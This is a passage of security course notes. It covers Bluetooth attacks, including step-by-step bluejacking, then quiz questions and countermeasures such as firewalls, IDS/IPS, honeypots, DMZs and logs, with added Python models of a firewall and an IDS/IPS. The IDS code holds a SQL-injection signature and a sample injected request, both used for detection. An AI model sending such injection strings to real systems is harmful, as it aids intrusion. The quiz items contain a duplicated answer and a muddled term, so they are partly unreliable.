jam wireless RF communication than wired communication. Because wireless RF communication can suffer
from these new threats, additional countermeasures are needed to protect against them.


Threat Techniques (64 of 66)

• Bluetooth Device Threat Techniques


– Blue Jacking
• Bluejacking delivers an unsolicited message to a nearby device through the phone book (contact)
mechanism

• On its own it does not give the attacker access to the data on the victim's device

• Copying the victim's data to the attacker's device is Bluesnarfing; editing or deleting it is Bluebugging

• Bluejacking can be done without engaging in any tedious process


Figure 2-67. Threat Techniques (64 of 66) DS011.0

Notes:
Blue-jacking
Bluejacking is carried out through the phone book: the attacker sends the victim a contact whose name field
carries a message. On its own it does not let the attacker read, manipulate or remove the data stored in the
victim's phone book. Transferring the victim's data to the attacker's own device, where it can be edited or
misused, is a Bluesnarfing attack, and editing or deleting data on the victim's device falls into the
Bluebugging category. Bluejacking requires no tedious process, but rather a short and easy set of steps,
which are as follows:


Threat Techniques (65 of 66)

• Bluetooth Device Threat Techniques


– Blue Jacking
• Step 1: First, access is gained to the contacts in the device (phonebook or Outlook)

• Step 2: A new contact is created by selecting “Create a Contact” option

• Step 3: A message is entered in the field where the contact name is supposed to be entered. This
message is from the attacker to alarm and scare the victim. The message is entered in the device
from which blue-jacking is to be done

• Step 4: This contact/message is now saved in the phonebook of the device

• Step 5: Now, this message is to be transmitted. This is done by sending the contact through
Bluetooth

• Step 6: After choosing the “Bluetooth” option to send contact/message, identify nearby devices and
then select the target device

• Step 7: The target device will now be blue-jacked after receiving the message


Figure 2-68. Threat Techniques (65 of 66) DS011.0

Notes:
The steps involved in the Bluetooth device threat technique are explained in this slide. It describes how a
mobile device is compromised using the technique of blue-jacking.


Threat Techniques (66 of 66)

• Bluetooth Device Threat Techniques


– Blue-bugging
• An attacker gains control of the phone book

• This attack is called blue-bugging.

• This attack causes a phone call to be initiated.

• The attacker can also use a different mechanism by which he can access the keypad of the target
phone

• This way, even if a call is initiated, it traces back to the victim’s number


Figure 2-69. Threat Techniques (66 of 66) DS011.0

Notes:
By gaining access to the phone book, an attacker has the necessary doors kicked down to enter the
contacts list and hence initiate a call to a particular contact. This attack is called blue-bugging. This attack
causes a phone call to be initiated. The hacker can also access the call logs and can call any of the
numbers present in the log list. The attacker can also use a different mechanism by which he can access the
keypad of the target phone, thereby taking control of the victim’s device completely. This way, even if a call is
initiated, it traces back to the victim’s number.
In the Petri-Net model, the hacker gains control of the victim’s device and can manipulate it in the following ways:
• Opening the contacts, going to “openpb” and then to “connect” while initiating a call to a particular contact.
• Entering the call logs through the contacts list and initiating a call to any number.
• Taking control of the keypad and using his own keyboard to make a call.


Checkpoint (1 of 4)

1. The malware threat technique can be carried out in how many steps?


– 4
– 5
– 3
– 7

2. Which of the following options shows the steps of the malware threat technique in the correct
order?
– Entry, Distribution, Exploit, Infect, Execute
– Distribution, Entry, Exploit, Infect, Execute
– Exploit, Entry, Exploit, Infect, Execute
– Infect, Entry, Exploit, Infect, Execute

3. Which of the following is a step of phishing?


– Fake login page
– Creating phishing.php file
– Creating index.html page
– All of the above


Figure 2-70. Checkpoint (1 of 4) DS011.0

Notes:
Write down your answers here
1. …
2. …
3. …


Checkpoint (2 of 4)

4. Which of the following options shows the steps of session hijacking in the correct order?
– Tracking the Connection, Desynchronizing the Connection, Injecting the Attacker’s Packet
– Desynchronizing the Connection, Tracking the Connection, Injecting the Attacker’s Packet
– Injecting the Attacker’s Packet, Tracking the Connection, Injecting the Attacker’s Packet
– Tracking the Connection, Desynchronizing the Connection, Injecting the Attacker’s Packet

5. How many steps are involved in blue-jacking?


– 5
– 4
– 7
– 10

6. Which of the following options shows the steps of buffer overflow in the correct order?
– Entrance, Running Commands, Smashing the Stack
– Smashing the Stack, Entrance, Running Commands
– Entrance, Smashing the Stack, Running Commands
– Running Commands, Smashing the Stack, Entrance


Figure 2-71. Checkpoint (2 of 4) DS011.0

Notes:
Write down your answers here:
4. …
5. …
6. …


Checkpoint (3 of 4)

7. How many steps are involved in a DoS attack?


– 3
– 6
– 5
– 4

8. How many steps are involved in Wi-Fi hacking?


– 4
– 5
– 6
– 3


Figure 2-72. Checkpoint (3 of 4) DS011.0

Notes:
Write down your answers here
7. …
8. …


Checkpoint (4 of 4)

9. Which of the following is not a step of cross-site script forgery?


– This sends malicious script back to the user’s Web browser
– The script host executes the malicious code
– This sends the sensitive data to the hacker’s computer
– None of the above

10. What is tailgating?


– When a malicious party sends a fraudulent email disguised as a legitimate email
– When one party lies to another to gain access to privileged data
– When an unauthorized party follows an authorized party into an otherwise secure location, usually to
steal valuable property or confidential information
– All of the above


Figure 2-73. Checkpoint (4 of 4) DS011.0

Notes:
Write down your answers here...
9. ...
10. ...


Unit summary

Having completed this unit, you should be able to:


• Have a basic understanding of threat techniques
• Classify all the threat techniques
• Identify and understand the steps involved in various attacks


Figure 2-74. Unit summary DS011.0

Unit 3. Countermeasures

What this unit is about


This unit is about
• Trends of Emerging Threats
• The Evolution of Information Security
• The Importance of Information Protection
• Countermeasures associated with data security

What you should be able to do


After completing this unit, you should be able to:
• Understand the trends of emerging threats
• Recognize the importance of information protection
• Enumerate the countermeasures associated with the different fields of security

How you will check your progress


• Checkpoint

References
Norman, "Assessing Vulnerability", Risk Analysis and Security Countermeasure Selection, 2009
http://www.microsoft.com/technet/security/bestprac/bpent/sec1/secthret.mspx
http://www.giac.org/paper/gsec/4152/identity-theft-attacks-countermeasures/106663
http://www.nsf.gov/oig/identitytheft.pdf
http://www.ils.unc.edu/~wenyang/inls258/wenyang.htm



Welcome to:

IT Data Security – Countermeasures


Figure 3-1. IT Data Security – Countermeasures DS011.0


Unit objectives

After completing this unit, you should be able to:


• Understand the trends of emerging threats
• Recognize the importance of information protection
• Enumerate the countermeasures associated with the different fields of security


Figure 3-2. Unit objectives DS011.0


Introduction

• There have been rapid advances in information technology (IT) systems

• The role of computer and internet networking has increased

• All the equipment in the network, the computing systems, the different servers and the data
that they hold are subject to threats


Figure 3-3. Introduction DS011.0

Notes:
Introduction
In recent years, there have been rapid advances in information technology (IT) systems, particularly in the
fields of cloud computing and mobile digital devices; therefore cybersecurity technologies are playing an
increasingly important role. The role of computer and internet networking has increased, which means that
new security policies and measures need to be employed in order to minimize the threats and vulnerabilities
associated with it. All the equipment in the network, the computing systems, the different servers and the
data that they hold are subject to threats. In order to protect organizations from the various threats to their
security, various security countermeasures are employed. The present security demands of an organization
must be evaluated in order to guarantee its security requirements. A weakness in security has a negative
impact on an organization. The main concern is the set of security objectives known as CIA: confidentiality,
integrity and availability.
Security countermeasures are used in organizations to protect the information security objectives. These
measures assist an evaluator in measuring the security level of an organization. This chapter enumerates
the countermeasures which are applied to protect the data in an organization from being breached.


The Importance of Data Protection

• Information is an important asset

• Information differentiates companies and provides leverage that helps one company become
more successful than another

• This is typically done in order to control access to the information in different ways,
depending on its importance, its sensitivity and its vulnerability to theft or misuse

• Organizations classify information in different ways in order to differently manage aspects of
its handling


Figure 3-4. The Importance of Data Protection DS011.0

Notes:
The Importance of Data Protection
Information is an important asset. The more information is at command, the better one can adapt to the world
around them. In business, information is often one of the most important assets a company possesses.
Information differentiates companies and provides leverage that helps one company become more
successful than another. Information can be classified into different categories.
This is typically done in order to control access to the information in different ways, depending on its
importance, its sensitivity and its vulnerability to theft or misuse. Organizations typically choose to deploy
more resources to control information that has higher sensitivity.
Organizations classify information in different ways in order to differently manage aspects of its handling,
such as labelling (whether headers, footers, and watermarks specify how it should be handled), distribution
(who gets to see it), duplication (how copies are made and handled), release (how it is provided to outsiders),
storage (where it is kept), encryption (if required), disposal (whether it is shredded or strongly wiped) and
methods of transmission (such as e-mail, fax, print and mail).
The specifics are spelled out in an organization’s information classification and handling policy, which
represents a very important component of an organization’s overall security policy.
Information intended for internal use only is usually meant to be seen by employees, contractors and service
providers, but not by the general public. Examples include internal memos, correspondence, general e-mail
and instant message discussions, company announcements, meeting requests, and general presentation
materials. This type of information is typically the least restricted—because spending a lot of time and money
on protecting it doesn’t outweigh the value of the information or the risk of its disclosure. Companies may
have confidential information, such as research and development plans, manufacturing processes, strategic
corporate information, product roadmaps, process descriptions, customer lists and contact information,
financial forecasts, and earnings announcements that are intended for internal use on a need-to-know basis.
Loss or theft of confidential information could violate the privacy of individuals, reduce the company’s
competitive advantage, or cause damage to the company. Specialized information or secret information may
include trade secrets, such as formulas, production details, and other intellectual property, proprietary
methodologies and practices that describe how services are provided, research plans, electronic codes,
passwords, and encryption keys. If disclosed, this type of information may severely damage the company’s
competitive advantage. It is usually restricted to only a few people or departments within a company and is
rarely disclosed outside the company.
Thus, protecting information by applying suitable countermeasures is important in order to mitigate data
breaches. Countermeasures minimize and mitigate the risks, and thus the number of data breaches is
reduced substantially.


Evolution of Mitigation Technique (1 of 6)

• Originally, the academic security model was “wide open” and the government security model
was “closed and locked.”

• In the early days of networking, individual computers were connected together only in
academic and government environments


Figure 3-5. Evolution of Mitigation Technique (1 of 6) DS011.0

Notes:
Evolution of threat mitigation techniques
In the early days of networking, individual computers were connected together only in academic and
government environments. Thus, at that time, the networking technologies that were developed were specific
to academic and government environments. Originally, the academic security model was “wide open” and the
government security model was “closed and locked.” There wasn’t much in between. The government was
mainly concerned with blocking access to computers, restricting internal access to confidential data, and
preventing interception of data (for example, by shielding equipment to prevent electromagnetic radiation
from being intercepted). This method of protecting assets provided a hard-to-penetrate perimeter, as depicted
in Fig. 1.


Evolution of Mitigation Technique (2 of 6)


Figure 3-6. Evolution of Mitigation Technique (2 of 6) DS011.0

Notes:
This figure illustrates the original government perimeter blockade model. It shows how no access was
provided to outsiders. The data present inside the perimeter was kept safe, as no one from outside could
access it.


Evolution of Mitigation Technique (3 of 6)

• In the academic world, the goal was to share information openly

• If these two models are compared, it can be noted that they are diametrically opposite

• The government model blocks everything, while the academic model allows everything


Figure 3-7. Evolution of Mitigation Technique (3 of 6) DS011.0

Notes:
In the academic world, the goal was to share information openly, so security controls were limited to
accounting functions in order to charge money for the use of computer time. Fig. 2 shows the original security
model for academic institutions. If these two models are compared, it can be noted that they are
diametrically opposite. The government model blocks everything, while the academic model allows
everything. There is plenty of room in between these two extremes.


Evolution of Mitigation Technique (4 of 6)


Figure 3-8. Evolution of Mitigation Technique (4 of 6) DS011.0

Notes:
This figure illustrates the original academic open-access model. It can be noticed that the academic model
allows every access which an outsider wants. Thus all the resources which have been deployed inside are
not protected and can be breached easily. Also, data can be leaked from this model very easily.


Evolution of Mitigation Technique (5 of 6)

• In the field of computer security, the practices established by the academic and government
institutions persisted until the early 1990s

• Those practices that have endured continue to have their place in a comprehensive security
strategy

• When businesses started to widely embrace the Internet as a sales channel and business
tool in the early-to-mid 1990s, a new security model was required


Figure 3-9. Evolution of Mitigation Technique (5 of 6) DS011.0

Notes:
In the field of computer security, the practices established by the academic and government institutions
persisted until the early 1990s, and some of those practices are still around today. Those practices that have
endured continue to have their place in a comprehensive security strategy, but they are no longer sufficient to
meet the needs of the modern computer network. When businesses started to widely embrace the Internet as
a sales channel and business tool in the early-to-mid 1990s, a new security model was required.
A closed-door approach doesn’t work when thousands or millions of people must be allowed to have access
to the services on an organization’s network. Likewise, an open-door approach doesn’t work when they need
to protect the privacy of each individual who interacts with the services on their network. E-commerce and
business required a more blended approach of providing limited access to data in a controlled fashion, which
is a more sophisticated and complex approach than that used by the earlier security models.
As the use of information technologies evolved, the original all-or-nothing approaches to security no longer
met the needs of information consumers. So, the practice of network security evolved. The concepts of
intranets and extranets were developed to accommodate internal and external customers, respectively, with
secured boundaries that resembled miniature versions of the firewall perimeter. Virtual private networks
(VPNs) were developed to provide a secure channel (or tunnel) from one network to another.
These approaches continued through the end of the 1990s to the early part of the 2000s, after which the first
edition of this book was published in late 2003. Throughout the first decade of the 21st century, the Internet
continued to become an increasingly critical business platform, and the network became more of a key
business component. As more companies started doing business on the Internet, concepts such as
Software-as-a-Service (SaaS) were developed to provide business services over the Internet. And the threats
found on the Internet evolved as well. Basic viruses and worms along with the simple exploits and
man-in-the-middle attacks found in the decade of the 1990s became more sophisticated, effective, and
ubiquitous.
Today, business partners need to share information with an organization and often with each other as well.
Employees, consultants, contractors, service providers, system integrators and other entities that augment a
company’s resources all need to collaborate with a pool of information. Customers require secure access to
the information that they need. A secure data network allows an organization to distribute information quickly
and effectively throughout the organization, to business partners and to customers. Fig. 3 characterizes the
interconnectedness among data, computers, networks and information consumers.


Evolution of Mitigation Technique (6 of 6)


Figure 3-10. Evolution of Mitigation Technique (6 of 6) DS011.0

Notes:
This figure illustrates the modern process of sharing information among many consumers. This information
is shared via many channels, all of which are illustrated in the diagram. This model uses the internet, SaaS,
the data network and cloud services for sharing data with the client, as shown in the figure.


Countermeasures (1 of 55)

• Overview
– Countermeasures discuss the subject of securing data storage, how security can be applied to the
specific locations where data resides

• Definition
– A countermeasure is a process, system, device or action that can mitigate or prevent the effects of
various threats that an information asset like a computer, network or server faces

• Explanation
– It is important to categorize the information before applying countermeasures to it. Information is
typically categorized as being in either a structured format or an unstructured format


Figure 3-11. Countermeasures (1 of 55) DS011.0

Notes:
Countermeasures
This section discusses the subject of securing data storage, how security can be applied to the specific
locations where data resides. It also focuses on the static state of data (information) on a hard disk or in a
database, but in the high-bandwidth, mobile and networked environments in which employees work and live,
information rarely stays in one place. In a matter of microseconds, information can be distributed to many
locations and people around the world. In order to secure this data, countermeasures must be applied which
can secure the stored information.
A countermeasure is a process, system, device or action that can mitigate or prevent the effects of various
threats that an information asset like a computer, network or server faces.
It is important to categorize the information before applying countermeasures to it. Information is typically
categorized as being in either a structured format or an unstructured format. The meaning of these terms is
subject to different interpretations by divergent groups, so first it is important to address their meaning in the
context of the discussion of securing unstructured data. It also makes sense to think in terms of which of three
different states data currently resides in: at rest, in transit or in use. To learn about various countermeasures,
it will be more fruitful if the countermeasures are explained according to the different fields of security. The
section below discusses these countermeasures of data security in more detail.


Countermeasures (2 of 55)

• Malware Countermeasures
– Anti-virus: The propagation of malicious code can be dealt with by using an antivirus software

– Firewall: A dedicated network appliance or a software program which serves the purpose of
separating an area which is secure from an area which is less secure. Following are the types of
firewall:
• Software Firewalls

• Hardware Firewalls


Figure 3-12. Countermeasures (2 of 55) DS011.0

Notes:
Malware
Malware is a specific piece of code or an application, specifically designed to harm or to gain access to a
targeted computer, or to spread across multiple computers over a network or via a data storage device.
These malware types and the threats they pose have been discussed in Units 1 and 2. Following are the
countermeasures which can be used against them.
Anti-virus: The propagation of malicious code can be dealt with by using antivirus software. Trojan
horses, viruses and worms are scanned for by the antivirus software installed on a system. There are
characteristics or fingerprints common to a family of viruses. These characteristics help in identifying and
neutralizing viruses before the virus spreads further. About 60,000 viruses, worms, logic bombs and various
other types of malicious code have been defined to date. However, the number keeps on increasing and new
ones come into play all the time. Keeping the definition database files current is usually a demanding task
for the antivirus manufacturer, as these files contain every known virus and the associated countermeasures
for a particular antivirus product. Organizations will always encounter new viruses that no other
organization has seen before. Therefore, if the virus database files in the software are kept up to date, the
exposure to an attack is reduced.
Firewall: A dedicated network appliance or a software program which serves the purpose of separating an
area which is secure from an area which is less secure, and which also controls the communication between
them, is a security device called a firewall.


The primary purpose of firewalls is to control the incoming and outgoing communication of a single machine
or a network. The two main types of firewalls are as follows:
- Software Firewalls: They are also known as personal firewalls, as they are designed to run on a single
system. Home or small computing systems usually use this type of firewall. Unwanted access over a
network connection is prevented by this type of firewall: first the unwanted access is identified and then
it is blocked on the ports which are risky. The computing system communicates over a set of recognized
ports, and the firewall permits these communications without even alerting the user about it.
- Hardware Firewalls: These firewalls are more complex than software firewalls. They run on a network
appliance which has been engineered especially for the purpose, or on servers which are optimized and
dedicated to the task of running the firewall. This type of firewall is very difficult to attack and has a
basic operating system. Configuring the system takes more steps than anticipated, and no other software
runs on this machine, making it very difficult to bypass. It may be placed between a network and an area
which is less secure.
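As an added example (not code from the IBM course notes), the rule evaluation a packet-filtering firewall performs, modelled in Python: ordered allow/deny rules separate an assumed internal zone (10.0.0.0/8) from the outside, the recognized ports are allow-listed, unsolicited inbound connection attempts into the secure zone are refused, and anything unmatched falls to default deny. All addresses, ports, packets and rules are constructed for illustration.

```python
"""Added example, not from the IBM course notes: a minimal packet filter that
models a firewall separating a secure zone from a less secure one.  Rules are
evaluated in order, the first match wins, and anything unmatched is denied.
All addresses, ports and packets are constructed for illustration."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import FrozenSet, List, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    src: str                 # source IP address
    dst: str                 # destination IP address
    proto: str               # "tcp" or "udp"
    dport: int               # destination port
    new_conn: bool = False   # True for a TCP SYN, i.e. a new connection attempt


@dataclass(frozen=True)
class Rule:
    action: str                               # "allow" or "deny"
    src_net: str                              # CIDR the source must belong to
    dst_net: str                              # CIDR the destination must belong to
    proto: Optional[str] = None               # None matches any protocol
    dports: Optional[FrozenSet[int]] = None   # None matches any port
    new_conn: Optional[bool] = None           # None: any packet; True: new connections only

    def matches(self, p: Packet) -> bool:
        if ip_address(p.src) not in ip_network(self.src_net):
            return False
        if ip_address(p.dst) not in ip_network(self.dst_net):
            return False
        if self.proto is not None and self.proto != p.proto:
            return False
        if self.dports is not None and p.dport not in self.dports:
            return False
        if self.new_conn is not None and self.new_conn != p.new_conn:
            return False
        return True


INTERNAL = "10.0.0.0/8"   # assumed secure zone (constructed)
ANY = "0.0.0.0/0"

# Ordered rule set.  The recognized ports from the notes are the allow-listed
# ones below; every other port is "risky" and ends in the default deny.
RULES: List[Rule] = [
    # Public web server that outsiders are allowed to reach
    Rule("allow", ANY, "10.0.1.10/32", "tcp", frozenset({80, 443})),
    # Internal hosts may open connections outward on recognized ports
    Rule("allow", INTERNAL, ANY, "tcp", frozenset({80, 443, 22})),
    Rule("allow", INTERNAL, ANY, "udp", frozenset({53})),
    # Refuse unsolicited connection attempts into the secure zone
    Rule("deny", ANY, INTERNAL, new_conn=True),
]


def filter_packet(p: Packet, rules: List[Rule] = RULES) -> str:
    """Return 'allow' or 'deny' for p; default deny when no rule matches."""
    for rule in rules:
        if rule.matches(p):
            return rule.action
    return "deny"


def filter_and_log(packets: List[Packet],
                   rules: List[Rule] = RULES) -> Tuple[List[str], List[str]]:
    """Filter a batch of packets.  Returns the decisions and one log line per
    denied packet, the kind of record a monitoring system would collect."""
    decisions, log = [], []
    for p in packets:
        verdict = filter_packet(p, rules)
        decisions.append(verdict)
        if verdict == "deny":
            log.append(f"DENY {p.proto} {p.src} -> {p.dst}:{p.dport}")
    return decisions, log


if __name__ == "__main__":
    sample = [
        Packet("203.0.113.5", "10.0.1.10", "tcp", 443, new_conn=True),   # outsider to web server
        Packet("203.0.113.5", "10.0.0.7", "tcp", 3389, new_conn=True),   # outsider to internal host
        Packet("10.0.0.7", "198.51.100.9", "tcp", 443, new_conn=True),   # internal host browsing out
    ]
    for line in filter_and_log(sample)[1]:
        print(line)
```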


Countermeasures (3 of 55)


Figure 3-13. Countermeasures (3 of 55) DS011.0

Notes:
This figure illustrates the working of a firewall. It can be noticed that the connection coming from the internet
is checked by the firewall and all viruses, worms etc. are filtered. After filtering the connection, a secured
private network connection is passed on to the systems situated in the organization. This secured
network is used by the different systems.


Countermeasures (4 of 55)

• Malware Countermeasures
– Anti-spyware: It is a type of software that is designed to detect and remove unwanted spyware
programs

– Educating end-users: Education is the second method by which viruses can be prevented


Figure 3-14. Countermeasures (4 of 55) DS011.0

Notes:
Anti-spyware: It is a type of software that is designed to detect and remove unwanted spyware programs.
Spyware is a type of malware that is installed on a computer without the user's knowledge in order to collect
information about them. This can pose a security risk to the user, but more frequently spyware degrades
system performance by taking up processing power, installing additional software, or redirecting users'
browser activity.
Anti-spyware software detects spyware through rules-based methods or based on downloaded definition files
that identify common spyware programs. Anti-spyware software can be used to find and remove spyware that
has already been installed on the user's computer, or it can act much like an anti-virus program by providing
real-time protection and preventing spyware from being downloaded in the first place.
Educating end-users: Education is the second method by which viruses can be prevented. Users should be
advised to open only those files which they have reasonable grounds to believe carry no trace of any virus.
Every email and every disk that they receive must be scanned, and it must be made sure that the document
doesn’t have any virus in it. An organization should also verify that security settings are high within the
applications their users are using.


Countermeasures (5 of 55)

• Network Security Countermeasures

– Network Monitors: Network monitors were introduced to meet the need to troubleshoot network
problems.

– Intrusion Detection Systems (IDS): A network administrator can configure a system so that it works
like a burglar alarm


Figure 3-15. Countermeasures (5 of 55) DS011.0

Notes:
Network Security
It is important to monitor the network and make sure the traffic on it belongs there. This section discusses
countermeasures which, if applied, help stop breaches of the data present on the network.
Network Monitors: Network monitors were introduced to meet the need to troubleshoot network problems.
When signalling and traffic had to be examined, configuration utilities such as IPCONFIG were of little help,
because they do not get down on the wire and show what is physically happening on the network. Hence a
network monitor was required, and over time monitors have become cheaper, smaller and simpler. They are
easy to use, effective, and work in most environments.
A network monitoring system consists of a computer whose network interface card (NIC) runs in promiscuous
mode, so that it accepts every frame on the segment rather than only those addressed to it, plus monitoring
software. This software is menu-driven and comes with an extensive help file, which makes it easier to use.
Sniffers display raw traffic; interpreting it can become quite involved and may require additional protocol
reference material. Two practical caveats: on a switched network a monitor sees only its own port's traffic
unless a mirror (SPAN) port or a tap is configured, and the same tool in an attacker's hands is an instrument
of data theft, so the monitoring station must itself be protected.
Intrusion Detection Systems (IDS): A network administrator can configure a system so that it works like a
burglar alarm. This is achieved with an intrusion detection system (IDS). Individual workstations or network
devices provide the platform for IDS software that tracks and monitors network activity, evaluates system
logs, identifies suspicious activity that violates the security policy, and can disconnect offending sessions.

The administrator tunes the IDS configuration to the action required. These tools demand planning and
ongoing maintenance to work effectively. Vendors now commonly sell IDSs together with firewalls. The two
complement each other: a firewall prevents many common attacks but lacks the intelligence to monitor the
whole network, while the IDS watches the traffic the firewall lets through. Together they combine the
preventing role of the firewall with the detecting and reacting role of the IDS.


Countermeasures (6 of 55)


Figure 3-16. Countermeasures (6 of 55) DS011.0

Notes:
This diagram illustrates a firewall and an IDS working together. The firewall filters the connection first,
blocking traffic that the policy does not allow; the IDS then inspects what the firewall has admitted and
detects the elements that could compromise a system. The combination is more secure than either alone,
because each covers what the other misses: the firewall stops traffic the IDS would otherwise have to
analyse, and the IDS catches attacks that travel over connections the firewall must permit.


Countermeasures (7 of 55)

• Network Security Countermeasures

– Honeypot: A computing system deliberately set up to be attacked, so that attacks on it can be observed

• The main purpose of a honeypot is to present an attractive, identifiable target that draws attackers
away from production systems and lets their techniques be studied

– Intrusion Prevention System (IPS): An Intrusion Prevention System (IPS) is a network
security/threat prevention technology that examines network traffic flows

• Vulnerability exploits usually come in the form of malicious inputs to a target application or service
that attackers use to interrupt and gain control of an application or machine


Figure 3-17. Countermeasures (7 of 55) DS011.0

Notes:
Honeypot: A honeypot is a computing system deliberately set up to be attacked. Its purpose is to present an
attractive, identifiable target so that attackers direct their effort at it rather than at production systems.
It acts as a ruse to lure an attack, and while the honeypot is being attacked the time is used to study the key
features of the attack, how it was developed and what tools were used. With this intelligence,
countermeasures can be prepared against further attacks. A honeypot also has the added benefit of protecting
high-value systems by drawing attackers away from them. Because a honeypot holds no production data, any
connection to it is suspicious by definition, which makes it a detector with very few false positives; it must
be isolated so that a compromised honeypot cannot be used as a stepping stone into the real network.
Intrusion Prevention System (IPS): An Intrusion Prevention System (IPS) is a network security/threat
prevention technology that examines network traffic flows to detect and prevent vulnerability exploits.
Vulnerability exploits usually come in the form of malicious inputs to a target application or service that
attackers use to interrupt, and gain control of, an application or machine.
Following a successful exploit, the attacker can disable the target application (resulting in a denial-of-service
state) or can potentially obtain all the rights and permissions available to the compromised application.
The IPS often sits directly behind the firewall and provides a complementary layer of analysis that filters
out dangerous content. Unlike its predecessor the Intrusion Detection System (IDS), which is a passive system
that scans traffic and reports on threats, the IPS is placed inline (in the direct communication path between
source and destination), actively analysing and taking automated actions on all traffic flows that enter the
network. Specifically, these actions include:
- Sending an alarm to the administrator (as an IDS would)
- Dropping the malicious packets
- Blocking traffic from the source address
- Resetting the connection
As an inline security component, the IPS must work efficiently to avoid degrading network performance. It
must also work fast, because exploits happen in near real time. The IPS must also detect and respond
accurately, so as to eliminate threats without false positives (legitimate packets misread as threats); in an
inline device a false positive is not merely a noisy alert but blocked legitimate traffic.
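The difference between a passive IDS and an inline IPS described above, as an added Python example that is not part of the course material: a toy inspector with two constructed signatures and a port-scan threshold runs over constructed packet records (addresses from the RFC 5737 documentation ranges). In inline mode it drops, resets and blocks; in IDS mode it only records alerts and passes everything. The signature set, the thresholds and the packet format are assumptions made for illustration, not the rules of any real product.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Packet:
    ts: float        # seconds since start of capture
    src: str         # source IPv4 address
    dst: str         # destination IPv4 address
    dport: int       # destination TCP port
    payload: bytes   # first bytes of application data


# Constructed signature set: (name, destination port, byte pattern, inline action).
# Real engines ship thousands of tuned rules; these two exist only for illustration.
SIGNATURES = [
    ("sqli-tautology", 80, b"' OR 1=1", "drop"),
    ("telnet-to-server", 23, b"", "reset"),   # any telnet session violates policy here
]
SCAN_WINDOW = 10.0   # seconds of history kept per source
SCAN_PORTS = 5       # distinct destination ports within the window that count as a scan


class TrafficInspector:
    """inline=True acts on traffic like an IPS; inline=False only reports, like an IDS."""

    def __init__(self, inline):
        self.inline = inline
        self.alerts = []                    # what the administrator is told
        self.blocked = set()                # source addresses blocked after a scan
        self._ports = defaultdict(list)     # src -> [(ts, dport), ...]

    def _signature_hit(self, pkt):
        for name, port, pattern, action in SIGNATURES:
            if pkt.dport == port and pattern in pkt.payload:
                return name, action
        return None

    def _is_scanning(self, pkt):
        history = [(t, p) for t, p in self._ports[pkt.src] if pkt.ts - t <= SCAN_WINDOW]
        history.append((pkt.ts, pkt.dport))
        self._ports[pkt.src] = history
        return len({p for _, p in history}) >= SCAN_PORTS

    def inspect(self, pkt):
        """Return the verdict for one packet: pass, drop, reset or blocked."""
        if self.inline and pkt.src in self.blocked:
            return "blocked"                 # block traffic from the source address
        verdict = "pass"
        hit = self._signature_hit(pkt)
        if hit:
            name, action = hit
            self.alerts.append(f"{name} from {pkt.src} to {pkt.dst}:{pkt.dport}")
            verdict = action                 # drop the packet or reset the connection
        if self._is_scanning(pkt):
            self.alerts.append(f"port scan from {pkt.src}")
            self.blocked.add(pkt.src)
            verdict = "drop"
        return verdict if self.inline else "pass"   # an IDS alarms but never interferes


def sample_traffic():
    """Constructed packets; addresses come from the RFC 5737 documentation ranges."""
    server = "203.0.113.5"
    scanner = "198.51.100.7"
    packets = [
        Packet(0.0, "192.0.2.10", server, 80, b"GET /index.html HTTP/1.1"),
        Packet(1.0, "192.0.2.11", server, 80, b"GET /login?user=a' OR 1=1-- HTTP/1.1"),
        Packet(2.0, "192.0.2.12", server, 23, b"\xff\xfd\x18"),
    ]
    packets += [Packet(3.0 + i, scanner, server, p, b"") for i, p in enumerate((21, 22, 25, 110, 143))]
    packets.append(Packet(9.0, scanner, server, 443, b""))   # arrives after the block takes effect
    return packets


def run(inline):
    """Inspect the sample traffic; returns (verdicts, alerts)."""
    engine = TrafficInspector(inline)
    verdicts = [engine.inspect(pkt) for pkt in sample_traffic()]
    return verdicts, engine.alerts


if __name__ == "__main__":
    for mode in (False, True):
        verdicts, alerts = run(inline=mode)
        print("IPS" if mode else "IDS", verdicts, alerts)
```

The false-positive cost the text mentions is visible in the rule set: the tautology pattern would also fire on a legitimate page that happens to contain that string, which in IDS mode is a noisy alert and in inline mode is an outage for that client.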

Countermeasures (8 of 55)

• Network Security Countermeasures (Contd.)

– Demilitarized Zone (DMZ): Local area networks (LAN) can be secured by using a firewall
configuration known as a DMZ

• A DMZ also allows one or more computers to run outside the internal firewall

– Security Logs/Access Logs: The Security log can be opened in Event Viewer underneath
Windows Logs

• The Maximum Log Size entry for the log should be as large as the organization can afford, and
Do Not Overwrite Events should be selected


Figure 3-18. Countermeasures (8 of 55) DS011.0

Notes:
Demilitarized Zone (DMZ): Local area networks (LAN) can be secured by using a firewall configuration
known as a DMZ. In a DMZ design, a firewall is connected to the public network (such as the Internet), and
the computers on the LAN run behind it. The DMZ also allows one or more computers to run outside the
internal firewall, in a separate segment that the public network can reach. These computers add a protective
layer for the systems behind the firewall by brokering requests and intercepting traffic: when a system inside
the firewall initiates an outbound request (permitted in traditional DMZs), the DMZ system forwards it to the
public network and relays the reply, which is why a DMZ commonly hosts a proxy server. The LAN firewall
forbids the computers in the DMZ from initiating inbound requests, so a compromised DMZ host gains no
direct path to the internal systems. A true DMZ computer therefore acts as an intermediary between incoming
requests and the internal firewall. In home broadband routers, by contrast, the "DMZ" is implemented by an
additional firewall rule that forwards all unsolicited inbound traffic to one internal host, so requests reach
that host directly. The feature is heavily advertised, but because the exposed host sits on the same network
as everything else, it is essentially not a true DMZ.
Security Logs/Access Logs: The Security log can be opened in Event Viewer underneath Windows Logs. A
lock icon (audit failure) or a key icon (audit success) precedes each event. Set the Maximum Log Size entry
for the log as large as the organization can afford, and select Do Not Overwrite Events. With that setting the
log stops recording when it is full, so the review cadence must keep pace with the volume of events: an
organization should audit the log entries at least weekly, check each time whether any alarms require a
response, and, if not, clear the file manually (saving a copy first where retention is required). Access logs in
Windows record each log-in and log-out, which makes them essentially similar to the Security log.


Countermeasures (9 of 55)

• Network Security Countermeasures


– Audit Logs: The log files created by crucial network services should be examined regularly. The
filters deployed on the logs target:

• Reporting

• Alarms

• Alerts

• Trends


Figure 3-19. Countermeasures (9 of 55) DS011.0

Notes:
Audit Logs: The log files created by crucial network services, such as DNS, should be examined regularly.
When the DNS service runs on Windows Server 2008 it writes entries to a log that Event Viewer can examine.
An organization should take the same actions for the DNS Server log as for the Security log, setting its size
and its overwrite behaviour. Firewalls, whether hardware or software, also create log files once logging is
enabled, as most other services do.
Because the firewall and its purpose are of the utmost importance, firewall logs should be evaluated on a
regular basis and held in high regard. The logs can be written wherever the organization chooses; where they
